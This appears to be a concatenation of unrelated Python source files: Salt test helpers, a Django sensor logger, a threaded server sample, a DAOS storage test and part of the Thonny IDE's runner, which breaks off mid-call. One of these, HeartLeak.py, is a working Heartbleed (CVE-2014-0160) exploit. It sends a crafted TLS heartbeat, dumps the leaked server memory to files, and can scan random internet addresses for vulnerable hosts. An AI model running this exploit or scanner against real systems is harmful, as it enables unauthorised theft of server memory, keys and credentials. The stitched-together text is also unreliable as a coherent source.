"'generate_random_name' will be removed after {{date}}".format(prefix),
)
return random_string(prefix, size=size, lowercase=False)
def random_string(prefix, size=6, uppercase=True, lowercase=True, digits=True):
"""
Generates a random string.
..versionadded: 3001
Args:
prefix(str): The prefix for the random string
size(int): The size of the random string
uppercase(bool): If true, include uppercased ascii chars in choice sample
lowercase(bool): If true, include lowercased ascii chars in choice sample
digits(bool): If true, include digits in choice sample
Returns:
str: The random string
"""
if not any([uppercase, lowercase, digits]):
raise RuntimeError(
"At least one of 'uppercase', 'lowercase' or 'digits' needs to be true"
)
choices = []
if uppercase:
choices.extend(string.ascii_uppercase)
if lowercase:
choices.extend(string.ascii_lowercase)
if digits:
choices.extend(string.digits)
return prefix + "".join(random.choice(choices) for _ in range(size))
class Webserver:
"""
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
"""
def __init__(self, root=None, port=None, wait=5, handler=None, ssl_opts=None):
"""
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
"""
if port is not None and not isinstance(port, int):
raise ValueError("port must be an integer")
if root is None:
root = RUNTIME_VARS.BASE_FILES
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError("root must be a string")
self.port = port
self.wait = wait
self.handler = (
handler if handler is not None else salt.ext.tornado.web.StaticFileHandler
)
self.web_root = None
self.ssl_opts = ssl_opts
def target(self):
"""
Threading target which stands up the tornado application
"""
self.ioloop = salt.ext.tornado.ioloop.IOLoop()
self.ioloop.make_current()
if self.handler == salt.ext.tornado.web.StaticFileHandler:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler, {"path": self.root})]
)
else:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler)]
)
self.application.listen(self.port, ssl_options=self.ssl_opts)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(("127.0.0.1", self.port)) == 0
def url(self, path):
"""
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
"""
if self.web_root is None:
raise RuntimeError("Webserver instance has not been started")
err_msg = (
"invalid path, must be either a relative path or a path "
"within {}".format(self.root)
)
try:
relpath = (
path if not os.path.isabs(path) else os.path.relpath(path, self.root)
)
if relpath.startswith(".." + os.sep):
raise ValueError(err_msg)
return "/".join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
"""
Starts the webserver
"""
if self.port is None:
self.port = get_unused_localhost_port()
self.web_root = "http{}://127.0.0.1:{}".format(
"s" if self.ssl_opts else "", self.port
)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
"Failed to start tornado webserver on 127.0.0.1:{} within "
"{} seconds".format(self.port, self.wait)
)
def stop(self):
"""
Stops the webserver
"""
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
class SaveRequestsPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Save all requests sent to the server.
"""
received_requests = []
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
self.received_requests.append(self.request)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
class MirrorPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Mirror a POST body back to the client
"""
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
body = self.request.body
log.debug("Incoming body: %s Incoming args: %s", body, args)
self.write(body)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
def dedent(text, linesep=os.linesep):
"""
A wrapper around textwrap.dedent that also sets line endings.
"""
linesep = salt.utils.stringutils.to_unicode(linesep)
unicode_text = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
clean_text = linesep.join(unicode_text.splitlines())
if unicode_text.endswith("\n"):
clean_text += linesep
if not isinstance(text, str):
return salt.utils.stringutils.to_bytes(clean_text)
return clean_text
class PatchedEnviron:
def __init__(self, **kwargs):
self.cleanup_keys = kwargs.pop("__cleanup__", ())
self.kwargs = kwargs
self.original_environ = None
def __enter__(self):
self.original_environ = os.environ.copy()
for key in self.cleanup_keys:
os.environ.pop(key, None)
# Make sure there are no unicode characters in the self.kwargs if we're
# on Python 2. These are being added to `os.environ` and causing
# problems
if sys.version_info < (3,):
kwargs = self.kwargs.copy()
clean_kwargs = {}
for k in self.kwargs:
key = k
if isinstance(key, str):
key = key.encode("utf-8")
if isinstance(self.kwargs[k], str):
kwargs[k] = kwargs[k].encode("utf-8")
clean_kwargs[key] = kwargs[k]
self.kwargs = clean_kwargs
os.environ.update(**self.kwargs)
return self
def __exit__(self, *args):
os.environ.clear()
os.environ.update(self.original_environ)
patched_environ = PatchedEnviron
class VirtualEnv:
def __init__(self, venv_dir=None, env=None):
self.venv_dir = venv_dir or tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
environ = os.environ.copy()
if env:
environ.update(env)
self.environ = environ
if salt.utils.platform.is_windows():
self.venv_python = os.path.join(self.venv_dir, "Scripts", "python.exe")
else:
self.venv_python = os.path.join(self.venv_dir, "bin", "python")
self.venv_bin_dir = os.path.dirname(self.venv_python)
def __enter__(self):
try:
self._create_virtualenv()
except subprocess.CalledProcessError:
raise AssertionError("Failed to create virtualenv")
return self
def __exit__(self, *args):
salt.utils.files.rm_rf(self.venv_dir)
def install(self, *args, **kwargs):
return self.run(self.venv_python, "-m", "pip", "install", *args, **kwargs)
def run(self, *args, **kwargs):
check = kwargs.pop("check", True)
kwargs.setdefault("cwd", self.venv_dir)
kwargs.setdefault("stdout", subprocess.PIPE)
kwargs.setdefault("stderr", subprocess.PIPE)
kwargs.setdefault("universal_newlines", True)
kwargs.setdefault("env", self.environ)
proc = subprocess.run(args, check=False, **kwargs)
ret = ProcessResult(
exitcode=proc.returncode,
stdout=proc.stdout,
stderr=proc.stderr,
cmdline=proc.args,
)
log.debug(ret)
if check is True:
try:
proc.check_returncode()
except subprocess.CalledProcessError:
raise ProcessFailed(
"Command failed return code check",
cmdline=proc.args,
stdout=proc.stdout,
stderr=proc.stderr,
exitcode=proc.returncode,
)
return ret
def _get_real_python(self):
"""
The reason why the virtualenv creation is proxied by this function is mostly
because under windows, we can't seem to properly create a virtualenv off of
another virtualenv(we can on linux) and also because, we really don't want to
test virtualenv creation off of another virtualenv, we want a virtualenv created
from the original python.
Also, on windows, we must also point to the virtualenv binary outside the existing
virtualenv because it will fail otherwise
"""
try:
if salt.utils.platform.is_windows():
return os.path.join(sys.real_prefix, os.path.basename(sys.executable))
else:
python_binary_names = [
"python{}.{}".format(*sys.version_info),
"python{}".format(*sys.version_info),
"python",
]
for binary_name in python_binary_names:
python = os.path.join(sys.real_prefix, "bin", binary_name)
if os.path.exists(python):
break
else:
raise AssertionError(
"Couldn't find a python binary name under '{}' matching: {}".format(
os.path.join(sys.real_prefix, "bin"), python_binary_names
)
)
return python
except AttributeError:
return sys.executable
def _create_virtualenv(self):
sminion = create_sminion()
sminion.functions.virtualenv.create(
self.venv_dir, python=self._get_real_python()
)
self.install("-U", "pip")
# https://github.com/pypa/setuptools/issues?q=is%3Aissue+setuptools+50+
self.install("-U", "setuptools<50.0.0")
@contextmanager
def change_cwd(path):
"""
Context manager helper to change CWD for a with code block and restore
it at the end
"""
old_cwd = os.getcwd()
try:
os.chdir(path)
# Do stuff
yield
finally:
# Restore Old CWD
os.chdir(old_cwd)
@functools.lru_cache(maxsize=1)
def get_virtualenv_binary_path():
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(real_prefix, "Scripts", "virtualenv.exe")
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get("PATH")
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ["PATH"] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which("virtualenv")
if path is not None:
# Restore previous environ PATH
os.environ["PATH"] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
return virtualenv_binary
|
HeartLeak.py | #!/usr/bin/env python27
#=========================================================#
# [+] Title: HeartLeak (CVE-2014-0160) #
# [+] Script: HeartLeak.py #
# [+] Twitter: https://twitter.com/OffensivePython #
# [+] Blog: http://pytesting.blogspot.com #
#=========================================================#
import socket
import struct
import sys
import time
import random
import threading
from optparse import OptionParser
class heartleak(object):
def __init__(self, host, port=443, verbose=False):
try:
self.sick=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sick.connect((host, port))
except socket.error:
return None
self.hello="\x16\x03\x02\x00\xdc\x01\x00\x00\xd8\x03\x02\x53\x43\x5b\x90\x9d"
self.hello+="\x9b\x72\x0b\xbc\x0c\xbc\x2b\x92\xa8\x48\x97\xcf\xbd\x39\x04\xcc"
self.hello+="\x16\x0a\x85\x03\x90\x9f\x77\x04\x33\xd4\xde\x00\x00\x66\xc0\x14"
self.hello+="\xc0\x0a\xc0\x22\xc0\x21\x00\x39\x00\x38\x00\x88\x00\x87\xc0\x0f"
self.hello+="\xc0\x05\x00\x35\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16"
self.hello+="\x00\x13\xc0\x0d\xc0\x03\x00\x0a\xc0\x13\xc0\x09\xc0\x1f\xc0\x1e"
self.hello+="\x00\x33\x00\x32\x00\x9a\x00\x99\x00\x45\x00\x44\xc0\x0e\xc0\x04"
self.hello+="\x00\x2f\x00\x96\x00\x41\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05"
self.hello+="\x00\x04\x00\x15\x00\x12\x00\x09\x00\x14\x00\x11\x00\x08\x00\x06"
self.hello+="\x00\x03\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00\x01\x02"
self.hello+="\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c"
self.hello+="\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07"
self.hello+="\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02"
self.hello+="\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f\x00\x01"
self.hello+="\x01"
self.hb="\x18\x03\x02\x00\x03\x01\xFF\xEC"
self.verbose=verbose
def receive(self, op):
data=''
chunk=''
typ, version, length = None, None, None
try:
data=self.sick.recv(5)
except socket.error:
return None, None, None
if data:
typ, version, length = struct.unpack('>BHH', data)
if typ==None:
return None, None, None
else:
if op==1: # handshake
data=self.sick.recv(length)
else: # heartbeat
# recveive all data sent by the server
while True:
try:
chunk = self.sick.recv(0xFFFF)
data+=chunk
except socket.error:
break
return typ, version, data
else:
return None, None, None
def handshake(self):
self.sick.send(self.hello) # send handshake
while True:
if self.verbose:
print("[+] Sending SSL Handshake")
typ, version, payload = self.receive(1)
if typ==None:
if self.verbose:
print("[-] Host doesn't support OpenSSL")
return None
if typ==22 and ord(payload[0])==0x0E:
if self.verbose:
print("[+] Received Hello back")
# Received hello back
break
return True
def heartbeat(self):
if self.verbose:
print("[+] Sending malicious heartbeat request")
self.sick.send(self.hb)
while True:
typ, version, payload = self.receive(2)
if typ==None or typ==21:
return False
if typ==24:
if len(payload)>3:
return payload
else:
return False
def destroy(self):
""" Close connection """
if self.verbose:
print("[+] Closing Connection")
self.sick.close()
def leakTest(hFile, host, port=443):
global n
sick=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sick.connect((host, port))
sick.close()
print("[+] %s supports SSL, trying to trigger the bug"%host)
target=heartleak(host)
if target and target.handshake():
if target.heartbeat():
print("-{#}-- %s is vulnerable -{#}--"%host)
if port==443:
hFile.write(host+'\r\n')
else:
hFile.write(host+":"+port+'\r\n')
n-=1
if n>0:
print("[+] Still looking for %d vulnerable hosts"%n)
target.destroy()
except socket.error:
sick.close()
pass
def scan(nhost, port, nthread):
hFile=open("heartleaked.log", "a")
global n
print("[+] Running a scan to find %d vulnerable host(s). Be patient!"%nhost)
n=nhost
while n>0:
try:
ip=randomHost()
try:
while threading.activeCount()>nthread:
time.sleep(5)
t=threading.Thread(target=leakTest, args=(hFile, ip, port))
t.start()
except:
time.sleep(5)
except KeyboardInterrupt:
print("[-] Cancelled due to keyboard interruption")
break
hFile.close()
return
def getStrings(data):
length=len(data)
printable=''
i=0
while i<length:
j=i
while ord(data[j])>31 and ord(data[j])<127 and j<length-1:
j+=1
if j-i>3: # if found a string of 4 bytes or more
printable+=data[i:j]+"\r\n"
i=j
else:
i+=1
return printable
def monitor(host, port):
print("-{# Sniffing data from %s"%host)
print("-{# Printable data will be stored in %s"%host+".txt")
print("-{# Raw data will be stored in %s"%host+".bin")
ascii=open(host+".txt", "a")
binary=open(host+".bin", "wb")
while True:
target=heartleak(host, port, verbose=True)
if target and target.handshake():
try:
leaked=target.heartbeat()
binary.write(leaked)
strings=getStrings(leaked)
ascii.write(strings)
print(strings)
time.sleep(10)
except KeyboardInterrupt:
target.destroy()
break
ascii.close()
binary.close()
def randomHost():
""" Generates a random IP address """
host=str(random.randint(0,255))
host+="."+str(random.randint(0,255))
host+="."+str(random.randint(0,255))
host+="."+str(random.randint(0,255))
return host
def main():
usage="Usage: %prog arg [options]\n"
usage+="Example:\n"
usage+=" %prog monitor --server=example.com\n"
usage+=" %prog scan --nhost=10 --threads=50\n"
parser=OptionParser(usage)
parser.add_option("-n", "--nhost", dest="nhost", type="int",
help="Number of Hosts", default=1)
parser.add_option("-t", "--threads", dest="nthread", type="int",
help="Number of threads (Default: 10 threads)",
default=10)
parser.add_option("-s", "--server", dest="host", type="string",
help="Target (IP Address) to monitor")
parser.add_option("-p", "--port", dest="port", type="int",
help="Port number (default: 443)", default=443)
options, args=parser.parse_args()
socket.setdefaulttimeout(10)
if len(args)>0:
port=options.port
if args[0]=="scan":
nhost=options.nhost
nthread=options.nthread
scan(nhost, port, nthread)
elif args[0]=="monitor" and options.host:
host=options.host
monitor(host, port)
else:
parser.print_help()
else:
parser.print_help()
if __name__=="__main__":
main()
|
herebedragons.py | # Django specific settings
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
# Django imports
from django.core.management.base import BaseCommand
# Application specific imports
# standard libs
import uuid
import datetime
import threading
import queue
# other libs
from sense_hat import SenseHat
# models
from aqms.models import *
# queues for communication between threads
#q_gen_messdaten = queue.Queue()
q_to_db = queue.Queue()
class Command(BaseCommand):
# Application logic,
@classmethod
def handle(cls, *args, **kwargs):
print("get data")
try:
pill2kill = threading.Event() # -> cyanide pills
gen_messdaten_thread = threading.Thread(target=SENSORIO.gen_messdaten_t, args=(pill2kill,))
gen_messdaten_thread.daemon = True # -> dies after main thread is closed
gen_messdaten_thread.start()
to_db_thread = threading.Thread(target=DBIO.to_db_t, args=(pill2kill,))
to_db_thread.daemon = True # -> dies after main thread is closed
to_db_thread.start()
#SenseHat.show_message("#", scroll_speed=1)
cls.get_message('')
finally:
pill2kill.set()
gen_messdaten_thread.join()
to_db_thread.join()
#return ('done', arg_counter)
@staticmethod
def get_message(placeholder):
while True:
sense = SenseHat()
sense.clear()
red = (255,0,0)
sense.show_message("HTL - TATü", text_colour=red)
# SENSORIO class -> handles all input/output from/to the sensors
class SENSORIO:
# meths
@staticmethod
def gen_messdaten_t(pill2kill): # <- code of gen_messdaten_t thread
#fe_log = None
try:
while not pill2kill.is_set():
try:
messdaten = MESSDATEN()
q_to_db.put(messdaten)
except Exception as e:
print('fufufufu' + str(e))
#fe_log = FILEIO.write_to_log('fe_log.txt', f'S_LINK_Error: {e}\n{traceback.format_exc()}')
continue
finally:
#if fe_log:
# CLIIO.print_to_shell('file create_slink_t error -> {root_dir}fe_log.txt')
print('gen_messdaten_t closed')
# DBIO class -> handles all input/output from/to database
class DBIO:
# meths
@staticmethod
def to_db_t(pill2kill): # <- code of to_db_t thread
#dbe_log = None
try:
while not pill2kill.is_set() or q_to_db.full():
messdaten = q_to_db.get(block=True) # -> wait for input
print(str(messdaten) + '\n')
if isinstance(messdaten, MESSDATEN):
values_for_db = messdaten.for_db()
# push to db
messdaten_db = Messdaten(UID=values_for_db['uuid'], \
Temperatur=values_for_db['temperatur'], \
Luftdruck=values_for_db['luftdruck'], \
Luftfeuchtigkeit=values_for_db['luftfeuchtigkeit'], \
VOC=values_for_db['voc'], \
FEINSTAUBPM25=values_for_db['feinstaubpm25'], \
FEINSTAUBPM100=values_for_db['feinstaubpm100'], \
Datum=values_for_db['datum'], \
DatumZeit=values_for_db['datumzeit'])
messdaten_db.save()
q_to_db.task_done()
finally:
#if fe_log:
# CLIIO.print_to_shell('file create_slink_t error -> {root_dir}fe_log.txt')
print('to_db_t closed')
# super EVIL object -> data of folders
class MESSDATEN:
# fields
_uuid = ''
_temperatur = 22
_luftdruck = 949
_luftfeuchtigkeit = 53
_voc = 2.5864
_feinstaubpm25= 4.279
_feinstaubpm100 = 5.627
_datum = ''
_datumzeit = ''
# ctor
def __init__(self):
# initialize sensor
sense = SenseHat()
# define data
self._uuid = str(uuid.uuid4())
self._temperatur = sense.get_temperature()
self._luftdruck = sense.get_pressure()
self._luftfeuchtigkeit = sense.get_humidity()
self._voc = os.popen('aqms/external/c/airsensor -o -v').read().rstrip('\n')
self._feinstaubpm25 = os.popen('aqms/external/bash/Feinstaub25.sh').read().rstrip('\n')
self._feinstaubpm100 = os.popen('aqms/external/bash/Feinstaub100.sh').read().rstrip('\n')
self._datum = datetime.date.today()
self._datumzeit = datetime.datetime.now()
def __repr__(self):
return str(self.__class__.__name__) + '; ' + str(self._datumzeit)
def __str__(self):
return 'uuid: ' + str(self._uuid) + '; \n' + \
'temperatur: ' + str(self._temperatur) + '; \n' + \
'luftdruck: ' + str(self._luftdruck) + '; \n' + \
'luftfeuchtigkeit: ' + str(self._luftfeuchtigkeit) + '; \n' + \
'voc: ' + str(self._voc) + '; \n' + \
'feinstaubpm25: ' + str(self._feinstaubpm25) + '; \n' + \
'feinstaubpm100: ' + str(self._feinstaubpm100) + '; \n' + \
'datum:' + str(self._datum) + '; \n' + \
'datumzeit:' + str(self._datumzeit)
# props
def get_uuid(self):
return self._uuid
def for_db(self):
return {
'uuid': self._uuid,
'temperatur': self._temperatur,
'luftdruck': self._luftdruck,
'luftfeuchtigkeit': self._luftfeuchtigkeit,
'voc': self._voc,
'feinstaubpm25': self._feinstaubpm25,
'feinstaubpm100': self._feinstaubpm100,
'datum': self._datum,
'datumzeit': self._datumzeit
}
|
srv_threaded.py | #!/usr/bin/env python3
# Foundations of Python Network Programming, Third Edition
# https://github.com/brandon-rhodes/fopnp/blob/m/py3/chapter07/srv_threaded.py
# Using multiple threads to serve several clients in parallel.
import zen_utils
from threading import Thread
def start_threads(listener, workers=4):
t = (listener,)
for i in range(workers):
Thread(target=zen_utils.accept_connections_forever, args=t).start()
if __name__ == '__main__':
address = zen_utils.parse_command_line('multi-threaded server')
listener = zen_utils.create_srv_socket(address)
start_threads(listener)
|
global_handle.py | #!/usr/bin/python
'''
(C) Copyright 2018-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
'''
import ctypes
import traceback
from multiprocessing import sharedctypes
from avocado import fail_on
from apricot import TestWithServers
from pydaos.raw import DaosPool, DaosContainer, DaosApiError, IOV
class GlobalHandle(TestWithServers):
"""Test the ability to share container handles among processes.
:avocado: recursive
"""
@fail_on(DaosApiError)
def check_handle(self, pool_glob_handle, uuidstr, cont_glob_handle, rank):
"""Verify that the global handles can be turned into local handles.
This gets run in a child process and verifies the global handles can be
turned into local handles in another process.
Args:
pool_glob_handle (sharedctypes.RawValue): pool handle
uuidstr (sharedctypes.RawArray): pool uuid
cont_glob_handle (sharedctypes.RawValue): container handle
rank (int): pool svc rank
Raises:
DaosApiError: if there was an error converting the pool handle or
using the local pool handle to create a container.
"""
# setup the pool and connect using global handle
pool = DaosPool(self.context)
pool.uuid = uuidstr
pool.set_svc(rank)
pool.group = "daos_server"
buf = ctypes.cast(
pool_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte * pool_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
pool_handle = pool.global2local(
self.context, pool_glob_handle.iov_len,
pool_glob_handle.iov_buf_len, buf2)
# perform an operation that will use the new handle, if it
# doesn't throw an exception, then all is well.
pool.pool_query()
# setup the container and then connect using the global handle
container = DaosContainer(self.context)
container.poh = pool_handle
buf = ctypes.cast(
cont_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte * cont_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
dummy_cont_handle = container.global2local(
self.context, cont_glob_handle.iov_len,
cont_glob_handle.iov_buf_len, buf2)
# just try one thing to make sure handle is good
container.query()
def test_global_handle(self):
"""Test ID: Jira-XXXX.
Test Description: Use a pool handle in another process.
:avocado: tags=all,daily_regression
:avocado: tags=tiny
:avocado: tags=container,global_handle,container_global_handle
"""
# initialize a python pool object then create the underlying
# daos storage and connect to it
self.add_pool(create=True, connect=True)
# create a pool global handle
iov_len, buf_len, buf = self.pool.pool.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_pool_handle = (
sharedctypes.RawValue(
IOV, ctypes.cast(c_buf, ctypes.c_void_p), buf_len, iov_len))
# create a container
self.add_container(self.pool)
self.container.open()
try:
# create a container global handle
iov_len, buf_len, buf = self.container.container.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_cont_handle = (
sharedctypes.RawValue(
IOV, ctypes.cast(c_buf, ctypes.c_void_p), buf_len, iov_len))
sct_pool_uuid = sharedctypes.RawArray(
ctypes.c_byte, self.pool.pool.uuid)
# this should work in the future but need on-line server addition
# arg_list = (
# p = Process(target=check_handle, args=arg_list)
# p.start()
# p.join()
# for now verifying global handle in the same process which is not
# the intended use case
self.check_handle(
sct_pool_handle, sct_pool_uuid, sct_cont_handle, 0)
except DaosApiError as error:
self.log.error(error)
self.log.error(traceback.format_exc())
self.fail("Expecting to pass but test has failed.\n")
|
running.py | # -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
import logging
import os.path
import shlex
import shutil
import signal
import subprocess
import sys
import time
import traceback
from logging import debug
from threading import Thread
from time import sleep
from thonny import (
THONNY_USER_DIR,
common,
get_runner,
get_shell,
get_workbench,
ui_utils,
)
from thonny.code import get_current_breakpoints,\
get_saved_current_script_filename
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
normpath_with_actual_case,
is_same_path,
parse_message,
path_startswith,
serialize_message,
update_system_path)
from thonny.misc_utils import construct_cmd_line, running_on_mac_os, running_on_windows
from typing import Any, List, Optional, Sequence, Set # @UnusedImport; @UnusedImport
from thonny.terminal import run_in_terminal
from thonny.ui_utils import select_sequence
WINDOWS_EXE = "python.exe"
class Runner:
def __init__(self) -> None:
get_workbench().set_default("run.auto_cd", True)
self._init_commands()
self._state = "starting"
self._proxy = None # type: Any
self._publishing_events = False
self._polling_after_id = None
self._postponed_commands = [] # type: List[CommandToBackend]
def _remove_obsolete_jedi_copies(self) -> None:
# Thonny 2.1 used to copy jedi in order to make it available
# for the backend. Get rid of it now
for item in os.listdir(THONNY_USER_DIR):
if item.startswith("jedi_0."):
shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)
def start(self) -> None:
self._check_alloc_console()
self.restart_backend(False, True)
# temporary
self._remove_obsolete_jedi_copies()
def _init_commands(self) -> None:
get_workbench().set_default("run.run_in_terminal_python_repl", False)
get_workbench().set_default("run.run_in_terminal_keep_open", True)
get_workbench().add_command(
"run_current_script",
"run",
"Run current script",
caption="Run",
handler=self._cmd_run_current_script,
default_sequence="<F5>",
extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
tester=self._cmd_run_current_script_enabled,
group=10,
image="run-current-script",
include_in_toolbar=True,
show_extra_sequences=True,
)
get_workbench().add_command(
"run_current_script_in_terminal",
"run",
"Run current script in terminal",
caption="RunT",
handler=self._cmd_run_current_script_in_terminal,
default_sequence="<Control-t>",
extra_sequences=["<<CtrlTInText>>"],
tester=self._cmd_run_current_script_in_terminal_enabled,
group=35,
image="terminal",
)
get_workbench().add_command(
"restart",
"run",
"Stop/Restart backend",
caption="Stop",
handler=self.cmd_stop_restart,
default_sequence="<Control-F2>",
group=70,
image="stop",
include_in_toolbar=True,
)
get_workbench().add_command(
"interrupt",
"run",
"Interrupt execution",
handler=self._cmd_interrupt,
tester=self._cmd_interrupt_enabled,
default_sequence="<Control-c>",
group=70,
bell_when_denied=False,
)
def get_state(self) -> str:
"""State is one of "running", "waiting_debugger_command", "waiting_toplevel_command"
"""
return self._state
def _set_state(self, state: str) -> None:
if self._state != state:
logging.debug("Runner state changed: %s ==> %s" % (self._state, state))
self._state = state
def is_running(self):
return self._state == "running"
def is_waiting(self):
return self._state.startswith("waiting")
def is_waiting_toplevel_command(self):
return self._state == "waiting_toplevel_command"
def is_waiting_debugger_command(self):
return self._state == "waiting_debugger_command"
def get_sys_path(self) -> List[str]:
return self._proxy.get_sys_path()
def send_command(self, cmd: CommandToBackend) -> None:
if self._proxy is None:
return
if self._publishing_events:
# allow all event handlers to complete before sending the commands
# issued by first event handlers
self._postpone_command(cmd)
return
# First sanity check
if (
isinstance(cmd, ToplevelCommand)
and not self.is_waiting_toplevel_command()
and cmd.name not in ["Reset", "Run", "Debug"]
or isinstance(cmd, DebuggerCommand)
and not self.is_waiting_debugger_command()
):
get_workbench().bell()
logging.warning(
"RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state())
)
return
# Attach extra info
if "debug" in cmd.name.lower():
cmd["breakpoints"] = get_current_breakpoints()
# Offer the command
logging.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
response = self._proxy.send_command(cmd)
if response == "discard":
return
elif response == "postpone":
self._postpone_command(cmd)
return
else:
assert response is None
get_workbench().event_generate("CommandAccepted", command=cmd)
if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
self._set_state("running")
if cmd.name[0].isupper():
get_workbench().event_generate("BackendRestart")
def _postpone_command(self, cmd: CommandToBackend) -> None:
# in case of InlineCommands, discard older same type command
if isinstance(cmd, InlineCommand):
for older_cmd in self._postponed_commands:
if older_cmd.name == cmd.name:
self._postponed_commands.remove(older_cmd)
if len(self._postponed_commands) > 10:
logging.warning(
"Can't pile up too many commands. This command will be just ignored"
)
else:
self._postponed_commands.append(cmd)
def _send_postponed_commands(self) -> None:
todo = self._postponed_commands
self._postponed_commands = []
for cmd in todo:
logging.debug("Sending postponed command: %s", cmd)
self.send_command(cmd)
def send_program_input(self, data: str) -> None:
assert self.is_running()
self._proxy.send_program_input(data)
def execute_script(
self,
script_path: str,
args: List[str],
working_directory: Optional[str] = None,
command_name: str = "Run",
) -> None:
if (
working_directory is not None
and get_workbench().get_cwd() != working_directory
):
# create compound command
# start with %cd
cd_cmd_line = construct_cmd_line(["%cd", working_directory]) + "\n"
next_cwd = working_directory
else:
# create simple command
cd_cmd_line = ""
next_cwd = get_workbench().get_cwd()
# append main command (Run, run, Debug or debug)
rel_filename = os.path.relpath(script_path, next_cwd)
exe_cmd_line = (
construct_cmd_line(["%" + command_name, rel_filename] + args) + "\n"
)
# submit to shell (shell will execute it)
get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)
def execute_current(
self, command_name: str, always_change_to_script_dir: bool = False
) -> None:
"""
This method's job is to create a command for running/debugging
current file/script and submit it to shell
"""
if not self.is_waiting_toplevel_command():
self.restart_backend(False, False, 2)
filename = get_saved_current_script_filename()
# changing dir may be required
script_dir = normpath_with_actual_case(os.path.dirname(filename))
if (
get_workbench().get_option("run.auto_cd")
and command_name[0].isupper()
or always_change_to_script_dir
):
working_directory = script_dir # type: Optional[str]
else:
working_directory = None
args = self._get_active_arguments()
self.execute_script(filename, args, working_directory, command_name)
def _get_active_arguments(self):
if get_workbench().get_option("view.show_program_arguments"):
args_str = get_workbench().get_option("run.program_arguments")
get_workbench().log_program_arguments_string(args_str)
return shlex.split(args_str)
else:
return []
def _cmd_run_current_script_enabled(self) -> bool:
return (
get_workbench().get_editor_notebook().get_current_editor() is not None
and "run" in get_runner().get_supported_features()
)
def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
return (self._proxy
and "run_in_terminal" in self._proxy.get_supported_features()
and self._cmd_run_current_script_enabled())
def _cmd_run_current_script(self) -> None:
self.execute_current("Run")
def _cmd_run_current_script_in_terminal(self) -> None:
filename = get_saved_current_script_filename()
self._proxy.run_script_in_terminal(
filename,
self._get_active_arguments(),
get_workbench().get_option("run.run_in_terminal_python_repl"),
